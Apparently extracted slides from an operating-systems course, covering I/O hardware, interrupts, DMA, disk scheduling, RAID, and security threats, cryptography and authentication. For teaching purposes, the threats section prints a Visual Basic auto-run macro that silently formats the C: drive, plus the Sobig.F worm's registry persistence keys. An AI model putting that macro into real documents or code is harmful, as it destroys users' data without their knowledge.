2. UNIT 5: UNDERSTANDING THE SYSTEM DESIGN
PROCESS
I/O Hardware
Secondary Storage Structure
The Security Problem
3. I/O Hardware…
I/O devices can be roughly categorized as storage, communications, user-
interface, and other
Devices communicate with the computer via signals sent over wires or
through the air.
Devices connect with the computer via ports, e.g. a serial or parallel port.
A common set of wires connecting multiple devices is termed a bus.
Buses include rigid protocols for the types of messages that can be sent across
the bus and the procedures for resolving contention issues.
4. I/O Hardware…
Figure 13.1 below illustrates three of the four
bus types commonly found in a modern PC:
The PCI bus connects high-speed high-
bandwidth devices to the memory subsystem (
and the CPU. )
The expansion bus connects slower low-
bandwidth devices, which typically deliver data
one character at a time ( with buffering. )
The SCSI bus connects a number of SCSI devices
to a common SCSI controller.
A daisy-chain bus, ( not shown) is when a string
of devices is connected to each other like beads
on a chain, and only one of the devices is
directly connected to the host.
A typical PC bus structure
5. I/O Hardware…
One way of communicating with devices is
through registers associated with each port.
Registers may be one to four bytes in size, and
may typically include ( a subset of ) the
following four:
The data-in register is read by the host to get
input from the device.
The data-out register is written by the host to
send output.
The status register has bits read by the host to
ascertain the status of the device, such as idle,
ready for input, busy, error, transaction
complete, etc.
The control register has bits written by the host
to issue commands or to change settings of the
device such as parity checking, word length, or
full- versus half-duplex operation.
Figure 13.2 shows some of the most common
I/O port address ranges.
Design I/O port location on PCs (partial)
6. I/O Hardware…
Another technique for communicating with devices is memory-mapped I/O.
In this case a certain portion of the processor's address space is mapped to the
device, and communications occur by reading and writing directly to/from those
memory areas.
Memory-mapped I/O is suitable for devices which must move large quantities of
data quickly, such as graphics cards.
Memory-mapped I/O can be used either instead of or more often in combination
with traditional registers. For example, graphics cards still use registers for
control information such as setting the video mode.
A potential problem exists with memory-mapped I/O, if a process is allowed to
write directly to the address space used by a memory-mapped I/O device.
( Note: Memory-mapped I/O is not the same thing as direct memory access, DMA.
See section 13.2.3 below. )
7. Polling
One simple means of device handshaking involves polling:
The host repeatedly checks the busy bit on the device until it becomes clear.
The host writes a byte of data into the data-out register, and sets the write bit in the command
register ( in either order. )
The host sets the command ready bit in the command register to notify the device of the pending
command.
When the device controller sees the command-ready bit set, it first sets the busy bit.
Then the device controller reads the command register, sees the write bit set, reads the byte of data
from the data-out register, and outputs the byte of data.
The device controller then clears the error bit in the status register, the command-ready bit, and
finally clears the busy bit, signaling the completion of the operation.
Polling can be very fast and efficient, if both the device and the controller are fast and if there is
significant data to transfer. It becomes inefficient, however, if the host must wait a long time in the
busy loop waiting for the device, or if frequent checks need to be made for data that is infrequently
there.
8. Interrupts
Interrupts allow devices to notify the CPU when they have data to transfer or when an operation is
complete, allowing the CPU to perform other duties when no I/O transfers need its immediate
attention.
The CPU has an interrupt-request line that is sensed after every instruction.
A device's controller raises an interrupt by asserting a signal on the interrupt request line.
The CPU then performs a state save, and transfers control to the interrupt handler routine at a fixed
address in memory. ( The CPU catches the interrupt and dispatches the interrupt handler. )
The interrupt handler determines the cause of the interrupt, performs the necessary processing,
performs a state restore, and executes a return from interrupt instruction to return control to the
CPU. ( The interrupt handler clears the interrupt by servicing the device. )
( Note that the state restored does not need to be the same state as the one that was saved when
the interrupt went off. See below for an example involving time-slicing. )
10. Interrupts…
The above description is adequate for simple interrupt-driven I/O, but there
are three needs in modern computing which complicate the picture:
The need to defer interrupt handling during critical processing,
The need to determine which interrupt handler to invoke, without having to
poll all devices to see which one needs attention, and
The need for multi-level interrupts, so the system can differentiate between
high- and low-priority interrupts for proper response.
11. Interrupts…
These issues are handled in modern computer architectures with interrupt-controller
hardware.
Most CPUs now have two interrupt-request lines: One that is non-maskable for critical error
conditions and one that is maskable, that the CPU can temporarily ignore during critical
processing.
The interrupt mechanism accepts an address, which is usually one of a small set of numbers
for an offset into a table called the interrupt vector. This table ( usually located at physical
address zero ? ) holds the addresses of routines prepared to process specific interrupts.
The number of possible interrupt handlers still exceeds the range of defined interrupt
numbers, so multiple handlers can be interrupt chained. Effectively the addresses held in the
interrupt vectors are the head pointers for linked-lists of interrupt handlers.
Figure 13.4 shows the Intel Pentium interrupt vector. Interrupts 0 to 31 are non-maskable and
reserved for serious hardware and other errors. Maskable interrupts, including normal device
I/O interrupts begin at interrupt 32.
Modern interrupt hardware also supports interrupt priority levels, allowing systems to mask
off only lower-priority interrupts while servicing a high-priority interrupt, or conversely to
allow a high-priority signal to interrupt the processing of a low-priority one.
13. Interrupts…
At boot time the system determines which devices are present, and loads
the appropriate handler addresses into the interrupt table.
During operation, devices signal errors or the completion of commands via
interrupts.
Exceptions, such as dividing by zero, invalid memory accesses, or attempts
to access kernel mode instructions can be signaled via interrupts.
Time slicing and context switches can also be implemented using the
interrupt mechanism.
The scheduler sets a hardware timer before transferring control over to a
user process.
When the timer raises the interrupt request line, the CPU performs a state-
save, and transfers control over to the proper interrupt handler, which in
turn runs the scheduler.
The scheduler does a state-restore of a different process before resetting
the timer and issuing the return-from-interrupt instruction.
A similar example involves the paging system for virtual memory - A page
fault causes an interrupt, which in turn issues an I/O request and a context
switch as described above, moving the interrupted process into the wait
queue and selecting a different process to run. When the I/O request has
completed ( i.e. when the requested page has been loaded up into physical
memory ), then the device interrupts, and the interrupt handler moves the
process from the wait queue into the ready queue, ( or depending on
scheduling algorithms and policies, may go ahead and context switch it back
onto the CPU. )
System calls are implemented via software interrupts, a.k.a. traps. When a ( library )
program needs work performed in kernel mode, it sets command information and
possibly data addresses in certain registers, and then raises a software interrupt. ( E.g.
21 hex in DOS. ) The system does a state save and then calls on the proper interrupt
handler to process the request in kernel mode. Software interrupts generally have low
priority, as they are not as urgent as devices with limited buffering space.
Interrupts are also used to control kernel operations, and to schedule activities for
optimal performance. For example, the completion of a disk read operation involves two
interrupts:
A high-priority interrupt acknowledges the device completion, and issues the next disk
request so that the hardware does not sit idle.
A lower-priority interrupt transfers the data from the kernel memory space to the user
space, and then transfers the process from the waiting queue to the ready queue.
The Solaris OS uses a multi-threaded kernel and priority threads to assign different
threads to different interrupt handlers. This allows for the "simultaneous" handling of
multiple interrupts, and the assurance that high-priority interrupts will take precedence
over low-priority ones and over user processes.
14. Direct Memory Access
For devices that transfer large quantities of data ( such as disk controllers ), it is wasteful to tie
up the CPU transferring data in and out of registers one byte at a time.
Instead this work can be off-loaded to a special processor, known as the Direct Memory Access,
DMA, Controller.
The host issues a command to the DMA controller, indicating the location where the data is
located, the location where the data is to be transferred to, and the number of bytes of data to
transfer. The DMA controller handles the data transfer, and then interrupts the CPU when the
transfer is complete.
A simple DMA controller is a standard component in modern PCs, and many bus-mastering I/O
cards contain their own DMA hardware.
Handshaking between DMA controllers and their devices is accomplished through two wires called
the DMA-request and DMA-acknowledge wires.
15. Direct Memory Access…
While the DMA transfer is going on the CPU
does not have access to the PCI bus ( including
main memory ), but it does have access to its
internal registers and primary and secondary
caches.
DMA can be done in terms of either physical
addresses or virtual addresses that are
mapped to physical addresses. The latter
approach is known as Direct Virtual Memory
Access, DVMA, and allows direct data transfer
from one memory-mapped device to another
without using the main memory chips.
Direct DMA access by user processes can speed
up operations, but is generally forbidden by
modern systems for security and protection
reasons. ( I.e. DMA is a kernel-mode
operation. )
Figure 13.5 below illustrates the DMA process.
Step in a DMA transfer
19. 19
Disk Structure
Disk drives are addressed as large 1-D arrays of logical
blocks, where the logical block is the smallest unit of
transfer
The 1-D array of logical blocks is mapped onto the sectors
of the disk sequentially
Sector 0 is the 1st sector of the 1st track on the outermost
cylinder
Mapping proceeds in order through that track, then the rest of the
tracks in that cylinder, and then through the rest of the cylinders
from outermost to innermost
21. 21
Disk Scheduling
The OS is responsible for using hardware
efficiently -- for the disk drives, this means
having a fast access time and high disk I/O
bandwidth
Access time has two major components
1. Seek time: move the head to the destination
cylinder
2. Rotational Latency: time for disk to rotate the
desired sector to the disk head
22. 22
Disk Architecture
Cylinder
Track
Sector Disk head
3500-7000 rpm
Seek time “seek to the cylinder” = 10 -2 second
Latency time: “Rotate to sector” = 0.5 x (60/6000) ~ 5x10 -3 second
Transmission Time:
Transfer bytes into
memory ~ 10 -4 sec
(1KB block size/(10MB/s) DMA rate)
23. 23
Disk Scheduling
Minimize seek time; seek time seek distance
Disk bandwidth= total # of bytes/(time: 1st
request to last request)
Some algorithms
1. First-Come-First-Served (FCFS)
2. Shortest-Seek-Time-First (SSTF)
3. SCAN (Elevator algorithm)
4. Circular-SCAN (C-SCAN)
5. C-LOOK (LOOK)
25. 25
1. First-Come-First-Served (FCFS)
Easy to program and intrinsically fair.
Ignore position relationships among pending
requests.
Acceptable when the loading on a disk is light and
requests are uniformly distributed. Not good for
medium and heavy loading.
26. 26
2. Shortest-Seek-Time-First (SSTF)
Select the request with minimum seek time from
the current head position.
A form of SJF scheduling
Better than FCFS in general.
It may cause starvation of some requests.
28. 28
SSTF
It is not optimal
Consider the servicing sequence (from the left): 53, 37, 14, 65, 57, 98, 122, 124,
184.
The total head movement is 208 tracks.
This is 28 tracks less than that of SSTF.
30. 30
3. SCAN (Elevator algorithm)
The disk arm starts at one end of the disk, and moves
toward the other end, servicing requests until it gets to
the other end of the disk, where the head movement is
reversed and servicing continues.
Most disk scheduling strategies actually implemented
based on SCAN
Improve throughput and mean response time.
32. 32
3. SCAN (Elevator algorithm)
Eliminate much of discrimination in SSTF
much lower variance in response time.
The requests at the other end of the disk wait the longest time.
But the upper bound on head movement for servicing a disk request is just twice
the number of disk tracks.
33. 33
4. C-SCAN
A variant of SCAN which provides a more uniform wait time
than SCAN.
The head moves from one end of the disk to the other end,
servicing requests as it goes. When it reaches the other end it
immediately returns to the beginning of the disk, without
servicing any requests on the return trip .
It has very small variance in response time; that is it maintains
a more uniform wait time distribution among the requests.
35. 35
5. C-LOOK
C-LOOK are the practical variants of C-SCAN.
The head is only moved as far as the last request in each direction.
When there are no requests in the current direction the head movement is
reversed.
C-SCAN always move the head from one end of the disk to the other.
37. 37
Selecting a Disk-Scheduling Algorithm
It is possible to develop an optimal algorithm but
the computation needed may not justify the
savings over SSTF or SCAN scheduling algorithms.
The SCAN and C-SCAN (or LOOK and C-LOOK)
algorithms are more appropriate for systems that
place a heavy load on the disk.
38. 38
Selecting a Disk-Scheduling Algorithm
If the queue seldom has more than one outstanding
request then all disk scheduling algorithms are
degraded to FCFS and thus are effectively equivalent.
Some disk controller manufacturers have moved disk
scheduling algorithms into the hardware itself.
The OS sends requests to the controller in FCFS order and
the controller queues them and execute them in some more
optimal order.
39. 39
Disk Management
Low-level formatting, or physical formatting --
Dividing a disk into sectors that the disk
controller can read and write.
To use a disk to hold files, the OS still needs to
record its own data structures on the disk.
Partition the disk into one or more groups of cylinders
Logical formatting for “making a file system”.
40. 40
Swap-Space Management
Swap-space -- Virtual memory uses disk space as
an extension of main memory.
Goal: to provide best throughput for virtual-
memory system.
42. 42
Swap-Space Use
Systems that implement swapping may use swap space to
hold the entire process image, including the code and
data segments. (Paging systems may simply store pages
that have been pushed out of main memory.)
Size of swap space: few MB to hundreds of MB
UNIX: multiple swap spaces, usually put on separate disks.
Unix copy entire processes between contiguous disk
regions and memory.
43. 43
Swap-Space Location
1. normal file system:
simply a large file within the file system
easy to implement, but inefficient due to the cost
of traversing the file-system data structure
2. separated disk partition (more common):
No file system or directory structure is placed on
this space.
A separate swap-space storage manager is used to
allocate and de-allocate the block (optimized for
speed not storage utilization)
44. 44
Swap-Space Management
BSD 4.3
Preallocation: allocates swap space when process starts;
holds text segment (the program) and data segment
kernel uses swap maps to track swap-space use
file system is consulted only once for each text segment;
pages from data segment are read in from the file system,
or created, and are written to swap space and paged back in
as needed.
45. 45
Swap-Space Management
Solaris 2
allocates swap space only when a page is forced out of
physical memory, not when the virtual memory page is
first created (modern computer has larger main
memory)
47. 47
Disk striping (interleaving)
A group of disks is treated as one storage unit.
Each data block is divided into several sub-blocks.
Each sub-block is stored on a separate disk.
This reduces disk block access time and can fully
utilize disk I/O bandwidth.
Performance improvement: All disks transfer their
subblocks in parallel
48. 48
RAID
RAID: Redundant Arrays of Inexpensive Disks
It improves performance (especially price
performance ratio) and reliability (with
duplication of data).
49. 49
RAID Level 1
known as Mirroring or shadowing,
makes a duplicate of all data files onto a second disk.
50% disk space utilization
the simplest RAID organization.
51. 51
RAID 3 : Block Interleaved Parity
An extra block of parity data is written to a
separate disk.
Example
if there are 9 disks in the array then sector 0 of disks 1
to 8 have their parity computed and stored on disk 9.
The operation takes place on bit level for each byte.
52. 52
Block Interleaved Parity:
1 0 1 0 1 1 1 1 0
Truth Table of XOR
Disk 1 Disk 2 Parity Disk
Input 1 Input 2 Output
1 1 0
1 0 1
0 1 1
0 0 0
53. 53
Block Interleaved Parity
Disk 1
1 0 1 0 ? 1 1 1 0
Truth Table of XOR
Disk 2 Disk 3
Input 1 Input 2 Output
1 1 0
1 0 1
0 1 1
0 0 0
1
54. 54
Block Interleaved Parity
If one disk crashes we can re-compute the original
data from the other data bits plus the parity.
It has been shown that with a RAID of 100
inexpensive disks and 10 parity disks the mean
time to data loss (MTDL) is 90 years.
MTDL of a standard large expensive disk is 2 or 3
years.
55. 55
RAID 3
Utilization issue:
stripping data across a minimum of two drives while using a third
drive to store each byte’s parity bit. 2/3 disk utilization (3 disks)
Performance issue:
During writing, because updating any single data subblock forces
the corresponding parity subblock to be recomputed ad rewritten.
Can manage only one data transfer at a time per array (for
example, a single read or write)
56. 56
RAID Level 5
Similar to RAID 3; all devices are used for data
storage, with parity bit recording distributed
across all drives.
RAID 5 provides the best combination of over-all
data availability and fault-tolerant protection.
57. 57
RAID Info
Read the article about RAID in the course
webpage: SunEXpert, March 1996, Vol. 7, No. 3,
“RAID: Wasted Days, Wasted nights”
59. The Security Problem
System secure if resources used and accessed as intended
under all circumstances
Unachievable
Intruders (crackers) attempt to breach security
Threat is potential security violation
Attack is attempt to breach security
Attack can be accidental or malicious
Easier to protect against accidental than malicious misuse
60. 60
What kinds of intruders are there?
Casual prying by nontechnical users
Curiosity
Snooping by insiders
Often motivated by curiosity or money
Determined attempt to make money
May not even be an insider
Commercial or military espionage
This is very big business!
61. Accidents cause problems, too…
Natural disasters
Fires
Earthquakes
Wars (is this really an “act of God”?)
Hardware or software error
CPU malfunction
Disk crash
Program bugs (hundreds of bugs found in the most recent Linux kernel)
Human errors
Data entry
Wrong tape mounted
rm * .o
62. Security Violation Categories
Breach of confidentiality
Unauthorized reading of data
Breach of integrity
Unauthorized modification of data
Breach of availability
Unauthorized destruction of data
Theft of service
Unauthorized use of resources
Denial of service (DOS)
Prevention of legitimate use
63. Security Violation Methods
Masquerading (breach authentication)
Pretending to be an authorized user to escalate privileges
Replay attack
As is or with message modification
Man-in-the-middle attack
Intruder sits in data flow, masquerading as sender to receiver and
vice versa
Session hijacking
Intercept an already-established session to bypass authentication
65. Security Measure Levels
Impossible to have absolute security, but make cost to
perpetrator sufficiently high to deter most intruders
Security must occur at four levels to be effective:
Physical
Data centers, servers, connected terminals
Human
Avoid social engineering, phishing, dumpster diving
Operating System
Protection mechanisms, debugging
Network
Intercepted communications, interruption, DOS
Security is as weak as the weakest link in the chain
But can too much security be a problem?
66. Program Threats
Many variations, many names
Trojan Horse
Code segment that misuses its environment
Exploits mechanisms for allowing programs written by users to be
executed by other users
Spyware, pop-up browser windows, covert channels
Up to 80% of spam delivered by spyware-infected systems
Trap Door
Specific user identifier or password that circumvents normal security
procedures
Could be included in a compiler
How to detect them?
Logic Bomb
Program that initiates a security incident under certain circumstances
67. Program Threats (Cont.)
Viruses
Code fragment embedded in legitimate program
Self-replicating, designed to infect other computers
Very specific to CPU architecture, operating system, applications
Usually borne via email or as a macro
Visual Basic Macro to reformat hard drive
Sub AutoOpen()
Dim oFS
Set oFS = CreateObject(’’Scripting.FileSystemObject’’)
vs = Shell(’’c:command.com /k format c:’’,vbHide)
End Sub
68. Program Threats (Cont.)
Virus dropper inserts virus onto the system
Many categories of viruses, literally many thousands of viruses
File / parasitic
Boot / memory
Macro
Source code
Polymorphic to avoid having a virus signature
Encrypted
Stealth
Tunneling
Multipartite
Armored
70. System and Network Threats
Some systems “open” rather than secure by default
Reduce attack surface
But harder to use, more knowledge needed to administer
Network threats harder to detect, prevent
Protection systems weaker
More difficult to have a shared secret on which to base access
No physical limits once system attached to internet
Or on network with system attached to internet
Even determining location of connecting system difficult
IP address is only knowledge
71. System and Network Threats (Cont.)
Worms – use spawn mechanism; standalone program
Internet worm
Exploited UNIX networking features (remote access) and bugs in finger
and sendmail programs
Exploited trust-relationship mechanism used by rsh to access friendly
systems without use of password
Grappling hook program uploaded main worm program
99 lines of C code
Hooked system then uploaded main code, tried to attack connected
systems
Also tried to break into other users accounts on local system via
password guessing
If target system already infected, abort, except for every 7th time
73. System and Network Threats (Cont.)
Port scanning
Automated attempt to connect to a range of ports on one or a
range of IP addresses
Detection of answering service protocol
Detection of OS and version running on system
nmap scans all ports in a given IP range for a response
nessus has a database of protocols and bugs (and exploits) to
apply against a system
Frequently launched from zombie systems
To decrease trace-ability
74. System and Network Threats (Cont.)
Denial of Service
Overload the targeted computer preventing it from doing any
useful work
Distributed denial-of-service (DDOS) come from multiple sites at
once
Consider the start of the IP-connection handshake (SYN)
How many started-connections can the OS handle?
Consider traffic to a web site
How can you tell the difference between being a target and being really
popular?
Accidental – CS students writing bad fork() code
Purposeful – extortion, punishment
75. Sobig.F Worm
More modern example
Disguised as a photo uploaded to adult newsgroup via account
created with stolen credit card
Targeted Windows systems
Had own SMTP engine to mail itself as attachment to everyone in
infect system’s address book
Disguised with innocuous subject lines, looking like it came from
someone known
Attachment was executable program that created
WINPPR23.EXE in default Windows system directory
Plus the Windows Registry
[HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun]
"TrayX" = %windir%winppr32.exe /sinc
[HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun]
"TrayX" = %windir%winppr32.exe /sinc
76. Cryptography as a Security Tool
Broadest security tool available
Internal to a given computer, source and destination of messages
can be known and protected
OS creates, manages, protects process IDs, communication ports
Source and destination of messages on network cannot be trusted
without cryptography
Local network – IP address?
Consider unauthorized host added
WAN / Internet – how to establish authenticity
Not via IP address
77. Cryptography
Means to constrain potential senders (sources) and / or
receivers (destinations) of messages
Based on secrets (keys)
Enables
Confirmation of source
Receipt only by certain destination
Trust relationship between sender and receiver
78. Encryption
Constrains the set of possible receivers of a message
Encryption algorithm consists of
Set K of keys
Set M of Messages
Set C of ciphertexts (encrypted messages)
A function E : K → (M→C). That is, for each k K, Ek is a function
for generating ciphertexts from messages
Both E and Ek for any k should be efficiently computable functions
A function D : K → (C → M). That is, for each k K, Dk is a
function for generating messages from ciphertexts
Both D and Dk for any k should be efficiently computable functions
79. Encryption (Cont.)
An encryption algorithm must provide this essential
property: Given a ciphertext c C, a computer can
compute m such that Ek(m) = c only if it possesses k
Thus, a computer holding k can decrypt ciphertexts to the
plaintexts used to produce them, but a computer not holding
k cannot decrypt ciphertexts
Since ciphertexts are generally exposed (for example, sent on
the network), it is important that it be infeasible to derive k
from the ciphertexts
80. Symmetric Encryption
Same key used to encrypt and decrypt
Therefore k must be kept secret
DES was most commonly used symmetric block-encryption algorithm (created by US
Govt)
Encrypts a block of data at a time
Keys too short so now considered insecure
Triple-DES considered more secure
Algorithm used 3 times using 2 or 3 keys
For example
2001 NIST adopted new block cipher - Advanced Encryption Standard (AES)
Keys of 128, 192, or 256 bits, works on 128 bit blocks
RC4 is most common symmetric stream cipher, but known to have vulnerabilities
Encrypts/decrypts a stream of bytes (i.e., wireless transmission)
Key is a input to pseudo-random-bit generator
Generates an infinite keystream
82. Asymmetric Encryption
Public-key encryption based on each user having two keys:
public key – published key used to encrypt data
private key – key known only to individual user used to decrypt
data
Must be an encryption scheme that can be made public
without making it easy to figure out the decryption scheme
Most common is RSA block cipher
Efficient algorithm for testing whether or not a number is prime
No efficient algorithm is know for finding the prime factors of a
number
83. Asymmetric Encryption (Cont.)
Formally, it is computationally infeasible to derive kd,N from
ke,N, and so ke need not be kept secret and can be widely
disseminated
ke is the public key
kd is the private key
N is the product of two large, randomly chosen prime numbers p
and q (for example, p and q are 512 bits each)
Encryption algorithm is Eke,N(m) = mke mod N, where ke satisfies
kekd mod (p−1)(q −1) = 1
The decryption algorithm is then Dkd,N(c) = ckd mod N
84. Asymmetric Encryption Example
For example. make p = 7and q = 13
We then calculate N = 7∗13 = 91 and (p−1)(q−1) = 72
We next select ke relatively prime to 72 and< 72, yielding 5
Finally, we calculate kd such that kekd mod 72 = 1, yielding 29
We how have our keys
Public key, ke,N = 5, 91
Private key, kd,N = 29, 91
Encrypting the message 69 with the public key results in the
cyphertext 62
Cyphertext can be decoded with the private key
Public key can be distributed in cleartext to anyone who wants to
communicate with holder of public key
86. Cryptography (Cont.)
Note symmetric cryptography based on transformations,
asymmetric based on mathematical functions
Asymmetric much more compute intensive
Typically not used for bulk data encryption
87. User Authentication
Crucial to identify user correctly, as protection systems depend on user ID
User identity most often established through passwords, can be considered a
special case of either keys or capabilities
Passwords must be kept secret
Frequent change of passwords
History to avoid repeats
Use of “non-guessable” passwords
Log all invalid access attempts (but not the passwords themselves)
Unauthorized transfer
Passwords may also either be encrypted or allowed to be used only once
Does encrypting passwords solve the exposure problem?
Might solve sniffing
Consider shoulder surfing
Consider Trojan horse keystroke logger
How are passwords stored at authenticating site?
88. Passwords
Encrypt to avoid having to keep secret
But keep secret anyway (i.e. Unix uses superuser-only readably file
/etc/shadow)
Use algorithm easy to compute but difficult to invert
Only encrypted password stored, never decrypted
Add “salt” to avoid the same password being encrypted to the same value
One-time passwords
Use a function based on a seed to compute a password, both user and computer
Hardware device / calculator / key fob to generate the password
Changes very frequently
Biometrics
Some physical attribute (fingerprint, hand scan)
Multi-factor authentication
Need two or more factors for authentication
i.e. USB “dongle”, biometric measure, and password
90. Example: Windows 7
Security is based on user accounts
Each user has unique security ID
Login to ID creates security access token
Includes security ID for user, for user’s groups, and special
privileges
Every process gets copy of token
System checks token to determine if access allowed or
denied
Uses a subject model to ensure access security
A subject tracks and manages permissions for each program that a
user runs
Each object in Windows has a security attribute defined by a security
descriptor
For example, a file has a security descriptor that indicates the
access permissions for all users
91. Example: Windows 7 (Cont.)
Win added mandatory integrity controls – assigns integrity
label to each securable object and subject
Subject must have access requested in discretionary access-
control list to gain access to object
Security attributes described by security descriptor
Owner ID, group security ID, discretionary access-control list,
system access-control list